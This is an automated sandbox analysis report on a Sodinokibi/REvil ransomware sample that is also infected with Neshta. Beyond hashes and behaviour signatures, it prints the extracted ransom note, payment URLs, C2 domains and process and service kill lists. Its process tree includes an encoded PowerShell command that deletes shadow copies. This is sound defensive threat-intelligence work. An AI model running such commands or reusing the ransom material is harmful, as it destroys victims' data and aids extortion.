Overview

overview

10

Static

static

10

c9d1ef33ca...51.exe

windows7_x64

10

c9d1ef33ca...51.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe

  • Size

    247KB

  • MD5

    04d97184729b092f1d795778caec8927

  • SHA1

    ee0a24536a64ed0803502501d6d6a1e336213063

  • SHA256

    c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251

  • SHA512

    c7cc2ec811f73c8b844281d689bfad03c89df321478e2cf2b4c3f0b46371bebf430349f1bfd8572d2588681189344b5b90e8a8b168ac3ac7c0d84521db1b23ec

Score
10/10
neshtasodinokibi$2a$10$zgqiy89jar0dy9/9hnp6ku0nkqxp6fzh6tuf1uc0s2.qefdpij9ls2866persistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\96u871fz-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 96u871fz. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/349C731D2845E903 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/349C731D2845E903 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ASf1Q1dh94sz0k+kW0fy6v5KZV8UUPtagk4znL1yBbfhn4AmI17CxF6XAuL/cB0l PBDmsx0nDwND5gvlBh+qvDVR3MoIz4ps+1EGnbZrH+NkBpM6IfnBTutxrJ43nMD2 3amIyPydHu5Z7WVr69sn7lg3O1scKNnco7uOujnv9etlHL89XR52cJfZV4Iv+g7T y0oT2MOdrTgndoG7EluhsnTGbtVlx4itXoCmbIBby4R/B00HU7cUOe8IB68y/xIV iuGAf+E1UKKLApXDWyQ0nNdUz1MtQo/Jf1yq3sYYyvMBRnPLKZKuUKzcO6DQjKjA x3929jbp3CdaXZStNxT5JXP93HlbhJlyODbtEevYQ+s9wuQBRqf+ktEQGHcJI1TB EooFICZO5YXaqMl96e8mn+O3oVgk141lSA+dq43VbiDZW3krxmP8eE/W3MLPY70H LbtWiYSyzNdtPpSn2jc2awVAYqZsgfdNLdcyS4rIiaBkfp9q2g7fmXtfxZLOG1dP AZwf8rXCArWeBIhpxptiRdA9v1AQVIVA7Dx4e5qMtSESdthPEp9ciJLQSSPm0uei 2iFD3M2EGw3LrPwb50hynGNBPB9InJPTcUzi9IY3+moWZBSJxOwCSkFr6TggSEI2 +lXMI6G17c3HQRC0s5kV2WSxbuuV8J7FeITz6kDPpclIULh0OwahII8FQzjLNKQq /XE6QyLicozf10j9sqCo/b1qEua/AONk/LS88iP/rcIRZlWAyagwe9EH5lDenOgx 7vyv0lPNpZhoTpZJnGPIpxoKOIJSkj8EIpYpDf/eeKFUXr9QY2FRH91+qc7Nf5bv anvs5Hulhnvm/U1m0KLaDbe3nsvTJZ0SjuC1t2rJqOwF1+yfoJVbFyhYSAOvRGwe O3KYwByXtgesV5XGKP9t6JsUaUyFmpoMaAICU+77PsoejOjUPQGY+BcIyMaMdgLO q68kdPq1ufeIs7Ma2gPmLNu/P2slzOwol1iOy80uUsQKJL78iHObqZQmOy/Rwvza jQO40Wpq/ex5KahFJiEJWt+HoIkbhEbNU7yXDjvGDKmrsKxdNweA65Nup0KdYxI4 zsUh58h6xWE84Yr9ix80g8CeHJb5vukoZflcQmERjKMzdMdSWZE2J6e/ARZUSCcY iSJThRSQ2vqoqHV0H+R53LSc322d6QXC1qDhYoZCNNdY5aF7qySdfCb6iZ95YMO7 W3TXEi7AdQxUdP2gMvK2J4CV8LIvoW6fbBQPf33AkpOM9k5hn8Kd/azzoIMBDUqr Di2vT/eYg3VCHov8nVfzLXAZA474G2O8deeVCw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/349C731D2845E903

http://decryptor.cc/349C731D2845E903

Extracted

Family

sodinokibi

Botnet

$2a$10$ZGqIY89Jar0DY9/9Hnp6Ku0nKqXP6FZH6TuF1uc0S2.QEFDPiJ9LS

Campaign

2866

C2

spargel-kochen.de

bloggyboulga.net

huehnerauge-entfernen.de

ravensnesthomegoods.com

highlinesouthasc.com

delawarecorporatelaw.com

campus2day.de

gopackapp.com

lubetkinmediacompanies.com

leda-ukraine.com.ua

kaminscy.com

ecoledansemulhouse.fr

oslomf.no

southeasternacademyofprosthodontics.org

kuntokeskusrok.fi

sloverse.com

tuuliautio.fi

coffreo.biz

testcoreprohealthuk.com

ulyssemarketing.com
Attributes
  • net

    true

  • pid

    $2a$10$ZGqIY89Jar0DY9/9Hnp6Ku0nKqXP6FZH6TuF1uc0S2.QEFDPiJ9LS

  • prc

    isqlplussvc

    mydesktopqos

    ocautoupds

    thebat

    dbeng50

    firefox

    tbirdconfig

    thunderbird

    synctime

    powerpnt

    winword

    mspub

    steam

    sqbcoreservice

    encsvc

    onenote

    oracle

    visio

    dbsnmp

    agntsvc

    sql

    infopath

    xfssvccon

    msaccess

    ocssd

    wordpad

    excel

    mydesktopservice

    outlook

    ocomm

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    2866

  • svc

    memtas

    mepocs

    svc$

    vss

    backup

    sql

    veeam

    sophos

Signatures

  • Detect Neshta Payload 3 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Drops startup file 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
    "C:\Users\Admin\AppData\Local\Temp\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Drops startup file
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1228
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1916
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1392
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1396 -s 1192
      1⤵
      • Program crash
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:480

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

      Download Submit

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      Download Submit

    • \??\c:\msocache\all users\{90140000-0011-0000-0000-0000000ff1ce}-c\ose.exe
      MD5

      8358e1747f61ad8dfc6010abbe3b2e69

      SHA1

      2f8b1cfed014fb7b354c1823a091bd0350c4842c

      SHA256

      644903941088019846b1d2e22acd69488ee2589ada9cd40a8607868e5705465f

      SHA512

      175d7372148ae71d58b05a9766a6ae7d8e97102892a47d22c5a179042d48b94888a0109d42bf5234c9f48220de72f2414ccc0391a38614af43eacd5a39b4fe69

      Download Submit

    • \??\c:\msocache\all users\{90140000-0011-0000-0000-0000000ff1ce}-c\setup.exe
      MD5

      279fbacc1553de8c705ec0e1a33aee68

      SHA1

      9989e58854fe5627424ae590c1551f2b23c12f28

      SHA256

      e8b2f5eea122279920201fe1782536457ea8cf17f06db740f1df22cd04aadc8b

      SHA512

      ff0dc6a90b5f279156131aaf987a47c19fef30e4e590c64ac193000f8da8900bd56822ff24b683a84efabb740ba96453ffaaa771d156c2e9cd39fc115d91cb3c

      Download Submit

    • \??\c:\msocache\all users\{90140000-0115-0409-0000-0000000ff1ce}-c\DW20.EXE
      MD5

      1f6d272728a0d02b041e8c47de259f06

      SHA1

      7888972fa1b237a3122d5e2fb980c80d5e393e9b

      SHA256

      7dfd5d5ee0616eb1bbdcea4e0c19c16ba34add0754a573a7d6df5f55446fb37a

      SHA512

      222ada8a0392c98dca9589d683adec3758334300fdfdcd02a5e30a5dda2bafeaa382cdc6cc86287219093c38d6541d5c8d291dc96352483f29c29c5fe1e27d2d

      Download Submit

    • \??\c:\msocache\all users\{90140000-0115-0409-0000-0000000ff1ce}-c\dwtrig20.exe
      MD5

      e4eb2e445fd2e9dcd0375850f2c79899

      SHA1

      08d2277bf93ab0940ce78ea1d311d01332fb1a8b

      SHA256

      ba4972885fdfafb91d1892e244ea4b7c426fc96ef92c8de3fbd50fc6dd404e40

      SHA512

      fbed96e10fad8a92d99a3811293f9d69f90eca442443969e0147f96d8141eea9c983c0b8d5ee24dcda153e4bfbbfdc10c1318baa9a8193f1f692d3e33c058f00

      Download Submit

    • \??\c:\users\admin\appdata\local\temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

      Download Submit

    • \??\c:\users\admin\appdata\roaming\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      cc7b57ca539493f36f65c8b1e0d5e8d4

      SHA1

      bd4f79c687d6bfadb12ba87b9b987afbf5bdd905

      SHA256

      df99911f7a9e4ecc700674fb682070b7c484d4036e3f047901f49f00bed1b604

      SHA512

      ec770fe3bbc077eee04f6f1cab2d849d2caecec51ccfc8eb7d08a8935fb4aafb719cdd03327fca7e409877af029b24a7ace98b59e9bd92aa8d8f4eba858792c6

      Download Submit

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

      Download Submit

    • memory/480-74-0x0000000001CF0000-0x0000000001CF1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1228-60-0x000007FEFC241000-0x000007FEFC243000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1228-65-0x000000000204B000-0x000000000206A000-memory.dmp

      Filesize

      124KB

      Download

    • memory/1228-61-0x000007FEF34A0000-0x000007FEF3FFD000-memory.dmp

      Filesize

      11.4MB

      Download

    • memory/1228-64-0x0000000002044000-0x0000000002047000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1228-63-0x0000000002042000-0x0000000002044000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1228-62-0x0000000002040000-0x0000000002042000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1580-55-0x00000000763B1000-0x00000000763B3000-memory.dmp

      Filesize

      8KB

      Download